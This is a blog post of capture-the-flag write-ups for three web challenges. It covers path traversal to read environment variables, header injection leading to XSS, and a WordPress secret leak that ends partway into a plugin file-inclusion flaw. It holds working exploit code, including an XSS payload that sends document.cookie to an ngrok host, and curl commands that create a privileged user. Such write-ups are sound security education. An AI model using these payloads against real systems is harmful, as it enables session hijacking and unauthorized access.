<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="[Web] Warmup 2Description Good morning everyone (GMT+8), let’s do some warmup!  AnalysisThe code uses a package called jaguar which runs on dart. 123456789import &#x27;package:jaguar&#x2F;jaguar.dart&amp;#x2">
<meta property="og:type" content="article">
<meta property="og:title" content="WGMY2024">
<meta property="og:url" content="https://chuajianshen.github.io/2024/12/29/WGMY2024/index.html">
<meta property="og:site_name" content="Shen">
<meta property="og:description" content="[Web] Warmup 2Description Good morning everyone (GMT+8), let’s do some warmup!  AnalysisThe code uses a package called jaguar which runs on dart. 123456789import &#x27;package:jaguar&#x2F;jaguar.dart&amp;#x2">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://chuajianshen.github.io/2024/12/29/WGMY2024/WGMY-WEB-LOGO.svg">
<meta property="og:image" content="https://hackmd.io/_uploads/B1_TgK0r1e.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rJ9lmYRS1x.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SJp4XY0r1l.png">
<meta property="og:image" content="https://hackmd.io/_uploads/S1QtdFAHkg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/Sk9hOKAB1e.png">
<meta property="og:image" content="https://hackmd.io/_uploads/S155qKCSJg.png">
<meta property="article:published_time" content="2024-12-29T08:46:08.000Z">
<meta property="article:modified_time" content="2024-12-29T08:53:54.530Z">
<meta property="article:author" content="Shen">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://chuajianshen.github.io/2024/12/29/WGMY2024/WGMY-WEB-LOGO.svg">
    
    
      
        
          <link rel="shortcut icon" href="/images/puck.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/puck.ico" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/puck.ico">
        
      
    
    <!-- title -->
    <title>WGMY2024</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/10/27/CRTO2024/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://chuajianshen.github.io/2024/12/29/WGMY2024/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&text=WGMY2024"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&title=WGMY2024"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&is_video=false&description=WGMY2024"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=WGMY2024&body=Check out this article: https://chuajianshen.github.io/2024/12/29/WGMY2024/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&title=WGMY2024"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&title=WGMY2024"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&title=WGMY2024"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&title=WGMY2024"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&name=WGMY2024&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://chuajianshen.github.io/2024/12/29/WGMY2024/&t=WGMY2024"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-Warmup-2"><span class="toc-number">1.</span> <span class="toc-text">[Web] Warmup 2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description"><span class="toc-number">1.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis"><span class="toc-number">1.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution"><span class="toc-number">1.3.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-myFile"><span class="toc-number">2.</span> <span class="toc-text">[Web] myFile</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-1"><span class="toc-number">2.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-1"><span class="toc-number">2.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-1"><span class="toc-number">2.3.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-WordMarket"><span class="toc-number">3.</span> <span class="toc-text">[Web] WordMarket</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-2"><span class="toc-number">3.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-2"><span class="toc-number">3.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-2"><span class="toc-number">3.3.</span> <span class="toc-text">Solution</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Old-version"><span class="toc-number">3.3.1.</span> <span class="toc-text">Old version</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Newest-version"><span class="toc-number">3.3.2.</span> <span class="toc-text">Newest version</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        WGMY2024
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Shen</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-12-29T08:46:08.000Z" class="dt-published" itemprop="datePublished">29-12-2024</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <img src="/2024/12/29/WGMY2024/WGMY-WEB-LOGO.svg" class="" title="logo">

<h1 id="Web-Warmup-2"><a href="#Web-Warmup-2" class="headerlink" title="[Web] Warmup 2"></a>[Web] Warmup 2</h1><h2 id="Description"><a href="#Description" class="headerlink" title="Description"></a>Description</h2><blockquote>
<p>Good morning everyone (GMT+8), let’s do some warmup!</p>
</blockquote>
<h2 id="Analysis"><a href="#Analysis" class="headerlink" title="Analysis"></a>Analysis</h2><p>The code uses a package called <a target="_blank" rel="noopener" href="https://github.com/Jaguar-dart/jaguar">jaguar</a> which runs on dart.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import &#x27;package:jaguar/jaguar.dart&#x27;;</span><br><span class="line"></span><br><span class="line">void main() async &#123;</span><br><span class="line">  final server = Jaguar(port: 80);</span><br><span class="line">  server.staticFiles(&#x27;/*&#x27;, &#x27;/app/public&#x27;);</span><br><span class="line">  server.log.onRecord.listen(print);</span><br><span class="line">  await server.serve(logRequests: true);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>The flag is located in the environment variable of the server.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">ingress:</span><br><span class="line">  enabled: true</span><br><span class="line">  className: traefik</span><br><span class="line">  annotations:</span><br><span class="line">    traefik.ingress.kubernetes.io/router.middlewares: default-ratelimit@kubernetescrd</span><br><span class="line">  hosts:</span><br><span class="line">    - host: dart.wgmy</span><br><span class="line">      paths:</span><br><span class="line">        - path: /</span><br><span class="line">          pathType: Prefix</span><br><span class="line"></span><br><span class="line">env:</span><br><span class="line">  WGMY_FLAG: flag&#123;test&#125; &lt;------ Flag</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>The functionality of the server is minimal as it only serves static files. However, browsing to <a target="_blank" rel="noopener" href="https://github.com/Jaguar-dart/jaguar/issues/157">github</a> shows that it contains a local file inclusion (lfi) vulnerability when there is a wildcard (*). This matches our code allowing us to read the environment variables from “&#x2F;proc&#x2F;self&#x2F;environ”.</p>
<h2 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line">URL = &quot;http://dart.wgmy/&quot;</span><br><span class="line"></span><br><span class="line">r = requests.get(URL + &quot;..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2fenviron&quot;)</span><br><span class="line"></span><br><span class="line">pattern = r&#x27;wgmy\&#123;.+?\&#125;&#x27;</span><br><span class="line"></span><br><span class="line">m = re.search(pattern, r.text)</span><br><span class="line"></span><br><span class="line">if m:</span><br><span class="line">    print(f&#x27;[*] Flag: &#123;m.group()&#125;&#x27;)</span><br><span class="line"></span><br><span class="line"># [*] Flag: wgmy&#123;1ab97a2708d6190bf882c1acc283984a&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="Web-myFile"><a href="#Web-myFile" class="headerlink" title="[Web] myFile"></a>[Web] myFile</h1><h2 id="Description-1"><a href="#Description-1" class="headerlink" title="Description"></a>Description</h2><blockquote>
<p>Built a file sharing website using ChatGPT! Feel free to try it!</p>
</blockquote>
<h2 id="Analysis-1"><a href="#Analysis-1" class="headerlink" title="Analysis"></a>Analysis</h2><p>The application allows you to upload files and subsequently share its download link by supplying its unique identifier. The application also hosts a bot where you can ask it to visit links. The goal of the challenge is to send an XSS payload to the admin bot as the flag is stored in the admin dashboard. Everything seemed secure except download.php.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">...</span><br><span class="line">if (file_exists($filepath)) &#123;</span><br><span class="line">	header(&#x27;Content-Description: File Download&#x27;);</span><br><span class="line">	header(&#x27;Content-Type: text/html&#x27;);</span><br><span class="line">	header(&#x27;Content-Disposition: attachment; filename=&quot;&#x27; . $_POST[&quot;name&quot;] . &#x27;&quot;&#x27;);</span><br><span class="line">	header(&#x27;Expires: 0&#x27;);</span><br><span class="line">	header(&#x27;Cache-Control: must-revalidate&#x27;);</span><br><span class="line">	header(&#x27;Pragma: public&#x27;);</span><br><span class="line">	header(&#x27;Content-Length: &#x27; . filesize($filepath));</span><br><span class="line">	flush(); // Flush system output buffer</span><br><span class="line">	readfile($filepath);</span><br><span class="line">	die();</span><br><span class="line">&#125; else &#123;</span><br><span class="line">        http_response_code(404);</span><br><span class="line">        die();</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>When visiting a file with a valid id, it is downloaded immediately as the header <code>&#39;Content-Disposition: attachment;&#39;</code> is set. Furthermore, it sets the Content-Type header as <code>text/html</code>. This would be useful later on. However, the application allows users to control the downloaded file name through <code>;filename=&quot;&#39; . $_POST[&quot;name&quot;]</code>.</p>
<p>When supplying a character such as new line (%0A) as the filename, the application would remove this header and display the file directly as it is no longer an attachment.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">POST /download.php HTTP/1.1</span><br><span class="line">Host: 43.216.228.210:32855</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate, br</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 50</span><br><span class="line">Origin: http://43.216.228.210:32855</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://43.216.228.210:32855/view.php?name=style.css&amp;id=4dabfef53b00cf801749f3b86745faf6</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">name=%0a&amp;id=4dabfef53b00cf801749f3b86745faf6</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Server: nginx</span><br><span class="line">Date: Sun, 29 Dec 2024 07:57:17 GMT</span><br><span class="line">Content-Type: text/html;charset=UTF-8</span><br><span class="line">Content-Length: 40</span><br><span class="line">Connection: close</span><br><span class="line">Content-Description: File Download</span><br><span class="line">Expires: 0</span><br><span class="line">Cache-Control: must-revalidate</span><br><span class="line">Pragma: public</span><br><span class="line"></span><br><span class="line">&lt;script&gt;alert(document.domain)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>As the Content-Type is set to <code>text/html</code> as mentioned previously, the browser would render the HTML and execute our JavaScript leading to XSS!</p>
<p><img src="https://hackmd.io/_uploads/B1_TgK0r1e.png" alt="image"></p>
<h2 id="Solution-1"><a href="#Solution-1" class="headerlink" title="Solution"></a>Solution</h2><p>I stole the admin cookie and hijacked its session to download the flag from the dashboard.</p>
<p>First, we would need to upload the XSS payload to the server and grab its unique id.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">-----------------------------253995375334721723141164679941</span><br><span class="line">Content-Disposition: form-data; name=&quot;fileToUpload&quot;; filename=&quot;xss.txt&quot;</span><br><span class="line">Content-Type: text/css</span><br><span class="line"></span><br><span class="line">&lt;script&gt;</span><br><span class="line">window.location=&#x27;https://ce3b-60-49-221-65.ngrok-free.app?c=&#x27;+document.cookie</span><br><span class="line">&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">-----------------------------253995375334721723141164679941--</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>After grabbing its id, we would send the bot our mallicious website which contains a script to perform the attack. It will open a window to the download page and make it “download” our file through a rogue form with a malformed name (%0A). This makes the browser render the file instead of actually downloading it, causing the XSS to fire and steal its cookies.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line"></span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;</span><br><span class="line">        Cookie Stealer</span><br><span class="line">    &lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line"></span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;form id=&quot;TheForm&quot; method=&quot;post&quot; action=&quot;http://localhost/download.php&quot; target=&quot;TheWindow&quot;&gt;</span><br><span class="line">        &lt;input type=&quot;hidden&quot; name=&quot;name&quot; value=&#x27;</span><br><span class="line">&#x27; /&gt;</span><br><span class="line">        &lt;input type=&quot;hidden&quot; name=&quot;id&quot; value=&quot;3ef8a2ff8eb9e021f497116e9e935400&quot; /&gt;</span><br><span class="line">        &lt;input type=&quot;hidden&quot; name=&quot;other&quot; value=&quot;something&quot; /&gt;</span><br><span class="line">        &lt;/form&gt;</span><br><span class="line">        </span><br><span class="line">    &lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">        window.open(&#x27;http://localhost/download.php&#x27;, &#x27;TheWindow&#x27;);</span><br><span class="line">        document.getElementById(&#x27;TheForm&#x27;).submit();</span><br><span class="line"></span><br><span class="line">    &lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line"></span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>After sending it to the bot, we receive its cookies.<br><img src="https://hackmd.io/_uploads/rJ9lmYRS1x.png" alt="image"></p>
<p><img src="https://hackmd.io/_uploads/SJp4XY0r1l.png" alt="image"></p>
<p><code>wgmy&#123;2e51ed84b09a65cec62b50ce8bc7e57c&#125;</code></p>
<h1 id="Web-WordMarket"><a href="#Web-WordMarket" class="headerlink" title="[Web] WordMarket"></a>[Web] WordMarket</h1><h2 id="Description-2"><a href="#Description-2" class="headerlink" title="Description"></a>Description</h2><blockquote>
<p>I’ve set up a WordPress eCommerce site for a client. Can you check if it’s secure enough for production? Give it a look and see if anything stands out.</p>
</blockquote>
<h2 id="Analysis-2"><a href="#Analysis-2" class="headerlink" title="Analysis"></a>Analysis</h2><p>The application is a WordPress site with WooCommerce and two plugins installed. One of it is <a target="_blank" rel="noopener" href="https://wordpress.org/plugins/cities-shipping-zones-for-woocommerce/">cities-shipping-zones-for-woocommerce</a> while the other one is a custom plugin. We will focus on the custom plugin first.</p>
<p>The route registers a rest API that allows users to register a WordPress user given that they know a secret value.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">add_action( &#x27;rest_api_init&#x27;, function () &#123;</span><br><span class="line">    register_rest_route( &#x27;wgmy/v1&#x27;, &#x27;/add_user&#x27;, array(</span><br><span class="line">      &#x27;methods&#x27; =&gt; &#x27;POST&#x27;,</span><br><span class="line">      &#x27;callback&#x27; =&gt; &#x27;user_creation_menu&#x27;,</span><br><span class="line">      &#x27;permission_callback&#x27; =&gt; &#x27;__return_true&#x27;,</span><br><span class="line">    ) );</span><br><span class="line">  &#125; );</span><br><span class="line">  </span><br><span class="line">function user_creation_menu()&#123;</span><br><span class="line">    if (isset($_POST[&quot;role&quot;]) &amp;&amp; isset($_POST[&quot;login&quot;]) &amp;&amp; isset($_POST[&quot;password&quot;]) &amp;&amp; isset($_POST[&quot;email&quot;]) &amp;&amp; isset($_POST[&quot;secret&quot;])) &#123;</span><br><span class="line">      if (get_option(&#x27;wgmy_secret&#x27;) == $_POST[&quot;secret&quot;])&#123;</span><br><span class="line">      ...</span><br><span class="line">      $user = new WP_User($user_id);</span><br><span class="line">      ...</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>However, there is a convenient route which reveals the secret to us as its not protected by authentication due to <code>add_action(&quot;wp_ajax_nopriv_get_config&quot;, &quot;get_config&quot;);</code>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">add_action(&quot;wp_ajax_get_config&quot;, &quot;get_config&quot;);</span><br><span class="line">add_action(&quot;wp_ajax_nopriv_get_config&quot;, &quot;get_config&quot;);</span><br><span class="line"></span><br><span class="line">function get_config()&#123;</span><br><span class="line">    if (isset($_POST[&quot;switch&quot;]) &amp;&amp; $_POST[&quot;switch&quot;] === &quot;1&quot;) &#123;</span><br><span class="line">        $secret_value = get_option(&#x27;wgmy_secret&#x27;);</span><br><span class="line">        if ($secret_value) &#123;</span><br><span class="line">            echo json_encode(array(&#x27;secret&#x27; =&gt; $secret_value));</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            echo json_encode(array(&#x27;error&#x27; =&gt; &#x27;Secret not found.&#x27;));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Sending a POST request to this endpoint reveals the secret, allowing us to register a user and login.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">curl -X POST -d &#x27;action=get_config&amp;switch=1&#x27; http://46.137.193.2/wp-admin/admin-ajax.php</span><br><span class="line"></span><br><span class="line">&#123;&quot;secret&quot;:&quot;owoE3Yx0h61pwosXyno2FiOtVe9CaHd6lx&quot;&#125;</span><br><span class="line"></span><br><span class="line">curl -X POST -d &#x27;role=shop_manager&amp;login=sh4n&amp;password=sh4n&amp;email=sh4n@sh4n.com&amp;secret=owoE3Yx0h61pwosXyno2FiOtVe9CaHd6lx&#x27; &#x27;http://46.137.193.2/index.php?rest_route=/wgmy/v1/add_user/&#x27;</span><br><span class="line">&#123;&quot;message&quot;:&quot;User created successfully!&quot;,&quot;user_id&quot;:19&#125;</span><br></pre></td></tr></table></figure>

<p>Now we can focus on the other plugin which is <a target="_blank" rel="noopener" href="https://wordpress.org/plugins/cities-shipping-zones-for-woocommerce/">cities-shipping-zones-for-woocommerce</a>. The README file shows that its version is 1.2.7 while the latest version is 1.2.9.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">=== Cities Shipping Zones for WooCommerce ===</span><br><span class="line">Contributors: condless</span><br><span class="line">Tags: dropdown, city, shipping zone, shipping method</span><br><span class="line">Requires at least: 5.2</span><br><span class="line">Tested up to: 6.5</span><br><span class="line">Requires PHP: 7.0</span><br><span class="line">Stable tag: 1.2.7</span><br><span class="line">License: GPLv2 or later</span><br><span class="line">License URI: http://www.gnu.org/licenses/gpl-2.0.html</span><br></pre></td></tr></table></figure>

<p>The plugin page indicates that version 1.2.7 contains a vulnerability which is later confirmed by a <a target="_blank" rel="noopener" href="https://patchstack.com/database/wordpress/plugin/cities-shipping-zones-for-woocommerce/vulnerability/wordpress-cities-shipping-zones-for-woocommerce-plugin-1-2-7-local-file-inclusion-vulnerability?_s_id=cve%5C%22,%5C%22source%5C%22:%5C%22audit@patchstack.com%5C%22%7D%5D%7D%7D">patchstack</a> post giving credit to the challenge author on discovering the LFI vulnerability.</p>
<p><img src="https://hackmd.io/_uploads/S1QtdFAHkg.png" alt="image"></p>
<p><img src="https://hackmd.io/_uploads/Sk9hOKAB1e.png" alt="image"></p>
<p>As the flag is located in the root directory of the filesystem, we will exploit this to read the flag.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">COPY plugins/flag.php /flag.php</span><br></pre></td></tr></table></figure>

<h2 id="Solution-2"><a href="#Solution-2" class="headerlink" title="Solution"></a>Solution</h2><p>After downloading the latest version and diffing it with the vulnerable version, we discover where the LFI vulnerability lies.</p>
<h3 id="Old-version"><a href="#Old-version" class="headerlink" title="Old version"></a>Old version</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">if ( ! empty( $value ) &amp;&amp; ! empty( $_POST[&#x27;wc_csz_countries_codes&#x27;] ) &amp;&amp; ! empty( $_POST[&#x27;wc_csz_set_zone_country&#x27;] ) &amp;&amp; ! empty( $_POST[&#x27;wc_csz_set_zone_id&#x27;] ) )  &#123;</span><br><span class="line">    include( &#x27;i18n/cities/&#x27; . $_POST[&#x27;wc_csz_set_zone_country&#x27;] . &#x27;.php&#x27; );</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

